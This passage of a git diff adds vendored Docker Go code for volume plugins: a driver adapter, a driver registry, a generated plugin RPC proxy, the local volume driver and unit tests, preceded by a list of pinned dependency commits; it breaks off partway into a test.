dae7e3d993bc3812a2185af60552bb6b847e52a0 + +# native credentials +github.com/docker/docker-credential-helpers f72c04f1d8e71959a6d103f808c50ccbad79b9fd + +# containerd +github.com/docker/containerd aa8187dbd3b7ad67d8e5e3a15115d3eef43a7ed1 +github.com/tonistiigi/fifo 1405643975692217d6720f8b54aeee1bf2cd5cf4 + +# cluster +github.com/docker/swarmkit 
1c7f003d75f091d5f7051ed982594420e4515f77 +github.com/golang/mock bd3c8e81be01eef76d4b503f5e687d2d1354d2d9 +github.com/gogo/protobuf v0.3 +github.com/cloudflare/cfssl 7fb22c8cba7ecaf98e4082d22d65800cf45e042a +github.com/google/certificate-transparency d90e65c3a07988180c5b1ece71791c0b6506826e +golang.org/x/crypto 3fbbcd23f1cb824e69491a5930cfeff09b12f4d2 +golang.org/x/time a4bde12657593d5e90d0533a3e4fd95e635124cb +github.com/mreiferson/go-httpclient 63fe23f7434723dc904c901043af07931f293c47 +github.com/hashicorp/go-memdb 608dda3b1410a73eaf3ac8b517c9ae7ebab6aa87 +github.com/hashicorp/go-immutable-radix 8e8ed81f8f0bf1bdd829593fdd5c29922c1ea990 +github.com/hashicorp/golang-lru a0d98a5f288019575c6d1f4bb1573fef2d1fcdc4 +github.com/coreos/pkg fa29b1d70f0beaddd4c7021607cc3c3be8ce94b8 +github.com/pivotal-golang/clock 3fd3c1944c59d9742e1cd333672181cd1a6f9fa0 +github.com/prometheus/client_golang 52437c81da6b127a9925d17eb3a382a2e5fd395e +github.com/beorn7/perks 4c0e84591b9aa9e6dcfdf3e020114cd81f89d5f9 +github.com/prometheus/client_model fa8ad6fec33561be4280a8f0514318c79d7f6cb6 +github.com/prometheus/common ebdfc6da46522d58825777cf1f90490a5b1ef1d8 +github.com/prometheus/procfs abf152e5f3e97f2fafac028d2cc06c1feb87ffa5 +bitbucket.org/ww/goautoneg 75cd24fc2f2c2a2088577d12123ddee5f54e0675 +github.com/matttproud/golang_protobuf_extensions fc2b8d3a73c4867e51861bbdd5ae3c1f0869dd6a +github.com/pkg/errors 839d9e913e063e28dfd0e6c7b7512793e0a48be9 + +# cli +github.com/spf13/cobra v1.5 https://github.com/dnephin/cobra.git +github.com/spf13/pflag dabebe21bf790f782ea4c7bbd2efc430de182afd +github.com/inconshreveable/mousetrap 76626ae9c91c4f2a10f34cad8ce83ea42c93bb75 +github.com/flynn-archive/go-shlex 3f9db97f856818214da2e1057f8ad84803971cff + +# metrics +github.com/docker/go-metrics 86138d05f285fd9737a99bee2d9be30866b59d72 + +# composefile +github.com/mitchellh/mapstructure f3009df150dadf309fdee4a54ed65c124afad715 +github.com/xeipuuv/gojsonpointer e0fe6f68307607d540ed8eac07a342c33fa1b54a 
+github.com/xeipuuv/gojsonreference e02fc20de94c78484cd5ffb007f8af96be030a45 +github.com/xeipuuv/gojsonschema 93e72a773fade158921402d6a24c819b48aba29d +gopkg.in/yaml.v2 a83829b6f1293c91addabc89d0571c246397bbf4 diff --git a/vendor/github.com/docker/docker/volume/drivers/adapter.go b/vendor/github.com/docker/docker/volume/drivers/adapter.go new file mode 100644 index 0000000000..62ef7dfe60 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/drivers/adapter.go @@ -0,0 +1,177 @@ +package volumedrivers + +import ( + "errors" + "path/filepath" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/volume" +) + +var ( + errNoSuchVolume = errors.New("no such volume") +) + +type volumeDriverAdapter struct { + name string + baseHostPath string + capabilities *volume.Capability + proxy *volumeDriverProxy +} + +func (a *volumeDriverAdapter) Name() string { + return a.name +} + +func (a *volumeDriverAdapter) Create(name string, opts map[string]string) (volume.Volume, error) { + if err := a.proxy.Create(name, opts); err != nil { + return nil, err + } + return &volumeAdapter{ + proxy: a.proxy, + name: name, + driverName: a.name, + baseHostPath: a.baseHostPath, + }, nil +} + +func (a *volumeDriverAdapter) Remove(v volume.Volume) error { + return a.proxy.Remove(v.Name()) +} + +func hostPath(baseHostPath, path string) string { + if baseHostPath != "" { + path = filepath.Join(baseHostPath, path) + } + return path +} + +func (a *volumeDriverAdapter) List() ([]volume.Volume, error) { + ls, err := a.proxy.List() + if err != nil { + return nil, err + } + + var out []volume.Volume + for _, vp := range ls { + out = append(out, &volumeAdapter{ + proxy: a.proxy, + name: vp.Name, + baseHostPath: a.baseHostPath, + driverName: a.name, + eMount: hostPath(a.baseHostPath, vp.Mountpoint), + }) + } + return out, nil +} + +func (a *volumeDriverAdapter) Get(name string) (volume.Volume, error) { + v, err := a.proxy.Get(name) + if err != nil { + return nil, err + } + + // plugin 
may have returned no volume and no error + if v == nil { + return nil, errNoSuchVolume + } + + return &volumeAdapter{ + proxy: a.proxy, + name: v.Name, + driverName: a.Name(), + eMount: v.Mountpoint, + status: v.Status, + baseHostPath: a.baseHostPath, + }, nil +} + +func (a *volumeDriverAdapter) Scope() string { + cap := a.getCapabilities() + return cap.Scope +} + +func (a *volumeDriverAdapter) getCapabilities() volume.Capability { + if a.capabilities != nil { + return *a.capabilities + } + cap, err := a.proxy.Capabilities() + if err != nil { + // `GetCapabilities` is a not a required endpoint. + // On error assume it's a local-only driver + logrus.Warnf("Volume driver %s returned an error while trying to query its capabilities, using default capabilties: %v", a.name, err) + return volume.Capability{Scope: volume.LocalScope} + } + + // don't spam the warn log below just because the plugin didn't provide a scope + if len(cap.Scope) == 0 { + cap.Scope = volume.LocalScope + } + + cap.Scope = strings.ToLower(cap.Scope) + if cap.Scope != volume.LocalScope && cap.Scope != volume.GlobalScope { + logrus.Warnf("Volume driver %q returned an invalid scope: %q", a.Name(), cap.Scope) + cap.Scope = volume.LocalScope + } + + a.capabilities = &cap + return cap +} + +type volumeAdapter struct { + proxy *volumeDriverProxy + name string + baseHostPath string + driverName string + eMount string // ephemeral host volume path + status map[string]interface{} +} + +type proxyVolume struct { + Name string + Mountpoint string + Status map[string]interface{} +} + +func (a *volumeAdapter) Name() string { + return a.name +} + +func (a *volumeAdapter) DriverName() string { + return a.driverName +} + +func (a *volumeAdapter) Path() string { + if len(a.eMount) == 0 { + mountpoint, _ := a.proxy.Path(a.name) + a.eMount = hostPath(a.baseHostPath, mountpoint) + } + return a.eMount +} + +func (a *volumeAdapter) CachedPath() string { + return a.eMount +} + +func (a *volumeAdapter) Mount(id string) 
(string, error) { + mountpoint, err := a.proxy.Mount(a.name, id) + a.eMount = hostPath(a.baseHostPath, mountpoint) + return a.eMount, err +} + +func (a *volumeAdapter) Unmount(id string) error { + err := a.proxy.Unmount(a.name, id) + if err == nil { + a.eMount = "" + } + return err +} + +func (a *volumeAdapter) Status() map[string]interface{} { + out := make(map[string]interface{}, len(a.status)) + for k, v := range a.status { + out[k] = v + } + return out +} diff --git a/vendor/github.com/docker/docker/volume/drivers/extpoint.go b/vendor/github.com/docker/docker/volume/drivers/extpoint.go new file mode 100644 index 0000000000..576dee8a1b --- /dev/null +++ b/vendor/github.com/docker/docker/volume/drivers/extpoint.go @@ -0,0 +1,215 @@ +//go:generate pluginrpc-gen -i $GOFILE -o proxy.go -type volumeDriver -name VolumeDriver + +package volumedrivers + +import ( + "fmt" + "sync" + + "github.com/docker/docker/pkg/locker" + getter "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/volume" +) + +// currently created by hand. generation tool would generate this like: +// $ extpoint-gen Driver > volume/extpoint.go + +var drivers = &driverExtpoint{ + extensions: make(map[string]volume.Driver), + driverLock: &locker.Locker{}, +} + +const extName = "VolumeDriver" + +// NewVolumeDriver returns a driver has the given name mapped on the given client. +func NewVolumeDriver(name string, baseHostPath string, c client) volume.Driver { + proxy := &volumeDriverProxy{c} + return &volumeDriverAdapter{name: name, baseHostPath: baseHostPath, proxy: proxy} +} + +// volumeDriver defines the available functions that volume plugins must implement. +// This interface is only defined to generate the proxy objects. +// It's not intended to be public or reused. 
+type volumeDriver interface { + // Create a volume with the given name + Create(name string, opts map[string]string) (err error) + // Remove the volume with the given name + Remove(name string) (err error) + // Get the mountpoint of the given volume + Path(name string) (mountpoint string, err error) + // Mount the given volume and return the mountpoint + Mount(name, id string) (mountpoint string, err error) + // Unmount the given volume + Unmount(name, id string) (err error) + // List lists all the volumes known to the driver + List() (volumes []*proxyVolume, err error) + // Get retrieves the volume with the requested name + Get(name string) (volume *proxyVolume, err error) + // Capabilities gets the list of capabilities of the driver + Capabilities() (capabilities volume.Capability, err error) +} + +type driverExtpoint struct { + extensions map[string]volume.Driver + sync.Mutex + driverLock *locker.Locker + plugingetter getter.PluginGetter +} + +// RegisterPluginGetter sets the plugingetter +func RegisterPluginGetter(plugingetter getter.PluginGetter) { + drivers.plugingetter = plugingetter +} + +// Register associates the given driver to the given name, checking if +// the name is already associated +func Register(extension volume.Driver, name string) bool { + if name == "" { + return false + } + + drivers.Lock() + defer drivers.Unlock() + + _, exists := drivers.extensions[name] + if exists { + return false + } + + if err := validateDriver(extension); err != nil { + return false + } + + drivers.extensions[name] = extension + + return true +} + +// Unregister dissociates the name from its driver, if the association exists. +func Unregister(name string) bool { + drivers.Lock() + defer drivers.Unlock() + + _, exists := drivers.extensions[name] + if !exists { + return false + } + delete(drivers.extensions, name) + return true +} + +// lookup returns the driver associated with the given name. 
If a +// driver with the given name has not been registered it checks if +// there is a VolumeDriver plugin available with the given name. +func lookup(name string, mode int) (volume.Driver, error) { + drivers.driverLock.Lock(name) + defer drivers.driverLock.Unlock(name) + + drivers.Lock() + ext, ok := drivers.extensions[name] + drivers.Unlock() + if ok { + return ext, nil + } + if drivers.plugingetter != nil { + p, err := drivers.plugingetter.Get(name, extName, mode) + if err != nil { + return nil, fmt.Errorf("Error looking up volume plugin %s: %v", name, err) + } + + d := NewVolumeDriver(p.Name(), p.BasePath(), p.Client()) + if err := validateDriver(d); err != nil { + return nil, err + } + + if p.IsV1() { + drivers.Lock() + drivers.extensions[name] = d + drivers.Unlock() + } + return d, nil + } + return nil, fmt.Errorf("Error looking up volume plugin %s", name) +} + +func validateDriver(vd volume.Driver) error { + scope := vd.Scope() + if scope != volume.LocalScope && scope != volume.GlobalScope { + return fmt.Errorf("Driver %q provided an invalid capability scope: %s", vd.Name(), scope) + } + return nil +} + +// GetDriver returns a volume driver by its name. +// If the driver is empty, it looks for the local driver. +func GetDriver(name string) (volume.Driver, error) { + if name == "" { + name = volume.DefaultDriverName + } + return lookup(name, getter.LOOKUP) +} + +// CreateDriver returns a volume driver by its name and increments RefCount. +// If the driver is empty, it looks for the local driver. +func CreateDriver(name string) (volume.Driver, error) { + if name == "" { + name = volume.DefaultDriverName + } + return lookup(name, getter.ACQUIRE) +} + +// RemoveDriver returns a volume driver by its name and decrements RefCount.. +// If the driver is empty, it looks for the local driver. 
+func RemoveDriver(name string) (volume.Driver, error) { + if name == "" { + name = volume.DefaultDriverName + } + return lookup(name, getter.RELEASE) +} + +// GetDriverList returns list of volume drivers registered. +// If no driver is registered, empty string list will be returned. +func GetDriverList() []string { + var driverList []string + drivers.Lock() + for driverName := range drivers.extensions { + driverList = append(driverList, driverName) + } + drivers.Unlock() + return driverList +} + +// GetAllDrivers lists all the registered drivers +func GetAllDrivers() ([]volume.Driver, error) { + var plugins []getter.CompatPlugin + if drivers.plugingetter != nil { + var err error + plugins, err = drivers.plugingetter.GetAllByCap(extName) + if err != nil { + return nil, fmt.Errorf("error listing plugins: %v", err) + } + } + var ds []volume.Driver + + drivers.Lock() + defer drivers.Unlock() + + for _, d := range drivers.extensions { + ds = append(ds, d) + } + + for _, p := range plugins { + name := p.Name() + ext, ok := drivers.extensions[name] + if ok { + continue + } + + ext = NewVolumeDriver(name, p.BasePath(), p.Client()) + if p.IsV1() { + drivers.extensions[name] = ext + } + ds = append(ds, ext) + } + return ds, nil +} diff --git a/vendor/github.com/docker/docker/volume/drivers/extpoint_test.go b/vendor/github.com/docker/docker/volume/drivers/extpoint_test.go new file mode 100644 index 0000000000..428b0752f2 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/drivers/extpoint_test.go @@ -0,0 +1,23 @@ +package volumedrivers + +import ( + "testing" + + volumetestutils "github.com/docker/docker/volume/testutils" +) + +func TestGetDriver(t *testing.T) { + _, err := GetDriver("missing") + if err == nil { + t.Fatal("Expected error, was nil") + } + Register(volumetestutils.NewFakeDriver("fake"), "fake") + + d, err := GetDriver("fake") + if err != nil { + t.Fatal(err) + } + if d.Name() != "fake" { + t.Fatalf("Expected fake driver, got %s\n", d.Name()) + } +} diff 
--git a/vendor/github.com/docker/docker/volume/drivers/proxy.go b/vendor/github.com/docker/docker/volume/drivers/proxy.go new file mode 100644 index 0000000000..b23db6258f --- /dev/null +++ b/vendor/github.com/docker/docker/volume/drivers/proxy.go @@ -0,0 +1,242 @@ +// generated code - DO NOT EDIT + +package volumedrivers + +import ( + "errors" + + "github.com/docker/docker/volume" +) + +type client interface { + Call(string, interface{}, interface{}) error +} + +type volumeDriverProxy struct { + client +} + +type volumeDriverProxyCreateRequest struct { + Name string + Opts map[string]string +} + +type volumeDriverProxyCreateResponse struct { + Err string +} + +func (pp *volumeDriverProxy) Create(name string, opts map[string]string) (err error) { + var ( + req volumeDriverProxyCreateRequest + ret volumeDriverProxyCreateResponse + ) + + req.Name = name + req.Opts = opts + if err = pp.Call("VolumeDriver.Create", req, &ret); err != nil { + return + } + + if ret.Err != "" { + err = errors.New(ret.Err) + } + + return +} + +type volumeDriverProxyRemoveRequest struct { + Name string +} + +type volumeDriverProxyRemoveResponse struct { + Err string +} + +func (pp *volumeDriverProxy) Remove(name string) (err error) { + var ( + req volumeDriverProxyRemoveRequest + ret volumeDriverProxyRemoveResponse + ) + + req.Name = name + if err = pp.Call("VolumeDriver.Remove", req, &ret); err != nil { + return + } + + if ret.Err != "" { + err = errors.New(ret.Err) + } + + return +} + +type volumeDriverProxyPathRequest struct { + Name string +} + +type volumeDriverProxyPathResponse struct { + Mountpoint string + Err string +} + +func (pp *volumeDriverProxy) Path(name string) (mountpoint string, err error) { + var ( + req volumeDriverProxyPathRequest + ret volumeDriverProxyPathResponse + ) + + req.Name = name + if err = pp.Call("VolumeDriver.Path", req, &ret); err != nil { + return + } + + mountpoint = ret.Mountpoint + + if ret.Err != "" { + err = errors.New(ret.Err) + } + + return +} + 
+type volumeDriverProxyMountRequest struct { + Name string + ID string +} + +type volumeDriverProxyMountResponse struct { + Mountpoint string + Err string +} + +func (pp *volumeDriverProxy) Mount(name string, id string) (mountpoint string, err error) { + var ( + req volumeDriverProxyMountRequest + ret volumeDriverProxyMountResponse + ) + + req.Name = name + req.ID = id + if err = pp.Call("VolumeDriver.Mount", req, &ret); err != nil { + return + } + + mountpoint = ret.Mountpoint + + if ret.Err != "" { + err = errors.New(ret.Err) + } + + return +} + +type volumeDriverProxyUnmountRequest struct { + Name string + ID string +} + +type volumeDriverProxyUnmountResponse struct { + Err string +} + +func (pp *volumeDriverProxy) Unmount(name string, id string) (err error) { + var ( + req volumeDriverProxyUnmountRequest + ret volumeDriverProxyUnmountResponse + ) + + req.Name = name + req.ID = id + if err = pp.Call("VolumeDriver.Unmount", req, &ret); err != nil { + return + } + + if ret.Err != "" { + err = errors.New(ret.Err) + } + + return +} + +type volumeDriverProxyListRequest struct { +} + +type volumeDriverProxyListResponse struct { + Volumes []*proxyVolume + Err string +} + +func (pp *volumeDriverProxy) List() (volumes []*proxyVolume, err error) { + var ( + req volumeDriverProxyListRequest + ret volumeDriverProxyListResponse + ) + + if err = pp.Call("VolumeDriver.List", req, &ret); err != nil { + return + } + + volumes = ret.Volumes + + if ret.Err != "" { + err = errors.New(ret.Err) + } + + return +} + +type volumeDriverProxyGetRequest struct { + Name string +} + +type volumeDriverProxyGetResponse struct { + Volume *proxyVolume + Err string +} + +func (pp *volumeDriverProxy) Get(name string) (volume *proxyVolume, err error) { + var ( + req volumeDriverProxyGetRequest + ret volumeDriverProxyGetResponse + ) + + req.Name = name + if err = pp.Call("VolumeDriver.Get", req, &ret); err != nil { + return + } + + volume = ret.Volume + + if ret.Err != "" { + err = 
errors.New(ret.Err) + } + + return +} + +type volumeDriverProxyCapabilitiesRequest struct { +} + +type volumeDriverProxyCapabilitiesResponse struct { + Capabilities volume.Capability + Err string +} + +func (pp *volumeDriverProxy) Capabilities() (capabilities volume.Capability, err error) { + var ( + req volumeDriverProxyCapabilitiesRequest + ret volumeDriverProxyCapabilitiesResponse + ) + + if err = pp.Call("VolumeDriver.Capabilities", req, &ret); err != nil { + return + } + + capabilities = ret.Capabilities + + if ret.Err != "" { + err = errors.New(ret.Err) + } + + return +} diff --git a/vendor/github.com/docker/docker/volume/drivers/proxy_test.go b/vendor/github.com/docker/docker/volume/drivers/proxy_test.go new file mode 100644 index 0000000000..b78c46a036 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/drivers/proxy_test.go @@ -0,0 +1,132 @@ +package volumedrivers + +import ( + "fmt" + "net/http" + "net/http/httptest" + "net/url" + "strings" + "testing" + + "github.com/docker/docker/pkg/plugins" + "github.com/docker/go-connections/tlsconfig" +) + +func TestVolumeRequestError(t *testing.T) { + mux := http.NewServeMux() + server := httptest.NewServer(mux) + defer server.Close() + + mux.HandleFunc("/VolumeDriver.Create", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintln(w, `{"Err": "Cannot create volume"}`) + }) + + mux.HandleFunc("/VolumeDriver.Remove", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintln(w, `{"Err": "Cannot remove volume"}`) + }) + + mux.HandleFunc("/VolumeDriver.Mount", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintln(w, `{"Err": "Cannot mount volume"}`) + }) + + mux.HandleFunc("/VolumeDriver.Unmount", func(w http.ResponseWriter, r *http.Request) { + 
w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintln(w, `{"Err": "Cannot unmount volume"}`) + }) + + mux.HandleFunc("/VolumeDriver.Path", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintln(w, `{"Err": "Unknown volume"}`) + }) + + mux.HandleFunc("/VolumeDriver.List", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintln(w, `{"Err": "Cannot list volumes"}`) + }) + + mux.HandleFunc("/VolumeDriver.Get", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintln(w, `{"Err": "Cannot get volume"}`) + }) + + mux.HandleFunc("/VolumeDriver.Capabilities", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + http.Error(w, "error", 500) + }) + + u, _ := url.Parse(server.URL) + client, err := plugins.NewClient("tcp://"+u.Host, &tlsconfig.Options{InsecureSkipVerify: true}) + if err != nil { + t.Fatal(err) + } + + driver := volumeDriverProxy{client} + + if err = driver.Create("volume", nil); err == nil { + t.Fatal("Expected error, was nil") + } + + if !strings.Contains(err.Error(), "Cannot create volume") { + t.Fatalf("Unexpected error: %v\n", err) + } + + _, err = driver.Mount("volume", "123") + if err == nil { + t.Fatal("Expected error, was nil") + } + + if !strings.Contains(err.Error(), "Cannot mount volume") { + t.Fatalf("Unexpected error: %v\n", err) + } + + err = driver.Unmount("volume", "123") + if err == nil { + t.Fatal("Expected error, was nil") + } + + if !strings.Contains(err.Error(), "Cannot unmount volume") { + t.Fatalf("Unexpected error: %v\n", err) + } + + err = driver.Remove("volume") + if err == nil { + t.Fatal("Expected error, was nil") + } + + if !strings.Contains(err.Error(), "Cannot remove volume") { + 
t.Fatalf("Unexpected error: %v\n", err) + } + + _, err = driver.Path("volume") + if err == nil { + t.Fatal("Expected error, was nil") + } + + if !strings.Contains(err.Error(), "Unknown volume") { + t.Fatalf("Unexpected error: %v\n", err) + } + + _, err = driver.List() + if err == nil { + t.Fatal("Expected error, was nil") + } + if !strings.Contains(err.Error(), "Cannot list volumes") { + t.Fatalf("Unexpected error: %v\n", err) + } + + _, err = driver.Get("volume") + if err == nil { + t.Fatal("Expected error, was nil") + } + if !strings.Contains(err.Error(), "Cannot get volume") { + t.Fatalf("Unexpected error: %v\n", err) + } + + _, err = driver.Capabilities() + if err == nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/volume/local/local.go b/vendor/github.com/docker/docker/volume/local/local.go new file mode 100644 index 0000000000..62c45e69ea --- /dev/null +++ b/vendor/github.com/docker/docker/volume/local/local.go @@ -0,0 +1,364 @@ +// Package local provides the default implementation for volumes. It +// is used to mount data volume containers and directories local to +// the host server. +package local + +import ( + "encoding/json" + "fmt" + "io/ioutil" + "os" + "path/filepath" + "reflect" + "strings" + "sync" + + "github.com/pkg/errors" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/utils" + "github.com/docker/docker/volume" +) + +// VolumeDataPathName is the name of the directory where the volume data is stored. +// It uses a very distinctive name to avoid collisions migrating data between +// Docker versions. +const ( + VolumeDataPathName = "_data" + volumesPathName = "volumes" +) + +var ( + // ErrNotFound is the typed error returned when the requested volume name can't be found + ErrNotFound = fmt.Errorf("volume not found") + // volumeNameRegex ensures the name assigned for the volume is valid. 
+ // This name is used to create the bind directory, so we need to avoid characters that + // would make the path to escape the root directory. + volumeNameRegex = utils.RestrictedNamePattern +) + +type validationError struct { + error +} + +func (validationError) IsValidationError() bool { + return true +} + +type activeMount struct { + count uint64 + mounted bool +} + +// New instantiates a new Root instance with the provided scope. Scope +// is the base path that the Root instance uses to store its +// volumes. The base path is created here if it does not exist. +func New(scope string, rootUID, rootGID int) (*Root, error) { + rootDirectory := filepath.Join(scope, volumesPathName) + + if err := idtools.MkdirAllAs(rootDirectory, 0700, rootUID, rootGID); err != nil { + return nil, err + } + + r := &Root{ + scope: scope, + path: rootDirectory, + volumes: make(map[string]*localVolume), + rootUID: rootUID, + rootGID: rootGID, + } + + dirs, err := ioutil.ReadDir(rootDirectory) + if err != nil { + return nil, err + } + + mountInfos, err := mount.GetMounts() + if err != nil { + logrus.Debugf("error looking up mounts for local volume cleanup: %v", err) + } + + for _, d := range dirs { + if !d.IsDir() { + continue + } + + name := filepath.Base(d.Name()) + v := &localVolume{ + driverName: r.Name(), + name: name, + path: r.DataPath(name), + } + r.volumes[name] = v + optsFilePath := filepath.Join(rootDirectory, name, "opts.json") + if b, err := ioutil.ReadFile(optsFilePath); err == nil { + opts := optsConfig{} + if err := json.Unmarshal(b, &opts); err != nil { + return nil, errors.Wrapf(err, "error while unmarshaling volume options for volume: %s", name) + } + // Make sure this isn't an empty optsConfig. + // This could be empty due to buggy behavior in older versions of Docker. 
+ if !reflect.DeepEqual(opts, optsConfig{}) { + v.opts = &opts + } + + // unmount anything that may still be mounted (for example, from an unclean shutdown) + for _, info := range mountInfos { + if info.Mountpoint == v.path { + mount.Unmount(v.path) + break + } + } + } + } + + return r, nil +} + +// Root implements the Driver interface for the volume package and +// manages the creation/removal of volumes. It uses only standard vfs +// commands to create/remove dirs within its provided scope. +type Root struct { + m sync.Mutex + scope string + path string + volumes map[string]*localVolume + rootUID int + rootGID int +} + +// List lists all the volumes +func (r *Root) List() ([]volume.Volume, error) { + var ls []volume.Volume + r.m.Lock() + for _, v := range r.volumes { + ls = append(ls, v) + } + r.m.Unlock() + return ls, nil +} + +// DataPath returns the constructed path of this volume. +func (r *Root) DataPath(volumeName string) string { + return filepath.Join(r.path, volumeName, VolumeDataPathName) +} + +// Name returns the name of Root, defined in the volume package in the DefaultDriverName constant. +func (r *Root) Name() string { + return volume.DefaultDriverName +} + +// Create creates a new volume.Volume with the provided name, creating +// the underlying directory tree required for this volume in the +// process. 
+func (r *Root) Create(name string, opts map[string]string) (volume.Volume, error) { + if err := r.validateName(name); err != nil { + return nil, err + } + + r.m.Lock() + defer r.m.Unlock() + + v, exists := r.volumes[name] + if exists { + return v, nil + } + + path := r.DataPath(name) + if err := idtools.MkdirAllAs(path, 0755, r.rootUID, r.rootGID); err != nil { + if os.IsExist(err) { + return nil, fmt.Errorf("volume already exists under %s", filepath.Dir(path)) + } + return nil, errors.Wrapf(err, "error while creating volume path '%s'", path) + } + + var err error + defer func() { + if err != nil { + os.RemoveAll(filepath.Dir(path)) + } + }() + + v = &localVolume{ + driverName: r.Name(), + name: name, + path: path, + } + + if len(opts) != 0 { + if err = setOpts(v, opts); err != nil { + return nil, err + } + var b []byte + b, err = json.Marshal(v.opts) + if err != nil { + return nil, err + } + if err = ioutil.WriteFile(filepath.Join(filepath.Dir(path), "opts.json"), b, 600); err != nil { + return nil, errors.Wrap(err, "error while persisting volume options") + } + } + + r.volumes[name] = v + return v, nil +} + +// Remove removes the specified volume and all underlying data. If the +// given volume does not belong to this driver and an error is +// returned. The volume is reference counted, if all references are +// not released then the volume is not removed. 
+func (r *Root) Remove(v volume.Volume) error { + r.m.Lock() + defer r.m.Unlock() + + lv, ok := v.(*localVolume) + if !ok { + return fmt.Errorf("unknown volume type %T", v) + } + + realPath, err := filepath.EvalSymlinks(lv.path) + if err != nil { + if !os.IsNotExist(err) { + return err + } + realPath = filepath.Dir(lv.path) + } + + if !r.scopedPath(realPath) { + return fmt.Errorf("Unable to remove a directory of out the Docker root %s: %s", r.scope, realPath) + } + + if err := removePath(realPath); err != nil { + return err + } + + delete(r.volumes, lv.name) + return removePath(filepath.Dir(lv.path)) +} + +func removePath(path string) error { + if err := os.RemoveAll(path); err != nil { + if os.IsNotExist(err) { + return nil + } + return errors.Wrapf(err, "error removing volume path '%s'", path) + } + return nil +} + +// Get looks up the volume for the given name and returns it if found +func (r *Root) Get(name string) (volume.Volume, error) { + r.m.Lock() + v, exists := r.volumes[name] + r.m.Unlock() + if !exists { + return nil, ErrNotFound + } + return v, nil +} + +// Scope returns the local volume scope +func (r *Root) Scope() string { + return volume.LocalScope +} + +func (r *Root) validateName(name string) error { + if len(name) == 1 { + return validationError{fmt.Errorf("volume name is too short, names should be at least two alphanumeric characters")} + } + if !volumeNameRegex.MatchString(name) { + return validationError{fmt.Errorf("%q includes invalid characters for a local volume name, only %q are allowed. If you intented to pass a host directory, use absolute path", name, utils.RestrictedNameChars)} + } + return nil +} + +// localVolume implements the Volume interface from the volume package and +// represents the volumes created by Root. 
+type localVolume struct { + m sync.Mutex + // unique name of the volume + name string + // path is the path on the host where the data lives + path string + // driverName is the name of the driver that created the volume. + driverName string + // opts is the parsed list of options used to create the volume + opts *optsConfig + // active refcounts the active mounts + active activeMount +} + +// Name returns the name of the given Volume. +func (v *localVolume) Name() string { + return v.name +} + +// DriverName returns the driver that created the given Volume. +func (v *localVolume) DriverName() string { + return v.driverName +} + +// Path returns the data location. +func (v *localVolume) Path() string { + return v.path +} + +// Mount implements the localVolume interface, returning the data location. +func (v *localVolume) Mount(id string) (string, error) { + v.m.Lock() + defer v.m.Unlock() + if v.opts != nil { + if !v.active.mounted { + if err := v.mount(); err != nil { + return "", err + } + v.active.mounted = true + } + v.active.count++ + } + return v.path, nil +} + +// Umount is for satisfying the localVolume interface and does not do anything in this driver. 
+func (v *localVolume) Unmount(id string) error { + v.m.Lock() + defer v.m.Unlock() + if v.opts != nil { + v.active.count-- + if v.active.count == 0 { + if err := mount.Unmount(v.path); err != nil { + v.active.count++ + return errors.Wrapf(err, "error while unmounting volume path '%s'", v.path) + } + v.active.mounted = false + } + } + return nil +} + +func validateOpts(opts map[string]string) error { + for opt := range opts { + if !validOpts[opt] { + return validationError{fmt.Errorf("invalid option key: %q", opt)} + } + } + return nil +} + +func (v *localVolume) Status() map[string]interface{} { + return nil +} + +// getAddress finds out address/hostname from options +func getAddress(opts string) string { + optsList := strings.Split(opts, ",") + for i := 0; i < len(optsList); i++ { + if strings.HasPrefix(optsList[i], "addr=") { + addr := (strings.SplitN(optsList[i], "=", 2)[1]) + return addr + } + } + return "" +} diff --git a/vendor/github.com/docker/docker/volume/local/local_test.go b/vendor/github.com/docker/docker/volume/local/local_test.go new file mode 100644 index 0000000000..f5a519b883 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/local/local_test.go @@ -0,0 +1,344 @@ +package local + +import ( + "io/ioutil" + "os" + "path/filepath" + "reflect" + "runtime" + "strings" + "testing" + + "github.com/docker/docker/pkg/mount" +) + +func TestGetAddress(t *testing.T) { + cases := map[string]string{ + "addr=11.11.11.1": "11.11.11.1", + " ": "", + "addr=": "", + "addr=2001:db8::68": "2001:db8::68", + } + for name, success := range cases { + v := getAddress(name) + if v != success { + t.Errorf("Test case failed for %s actual: %s expected : %s", name, v, success) + } + } + +} + +func TestRemove(t *testing.T) { + // TODO Windows: Investigate why this test fails on Windows under CI + // but passes locally. 
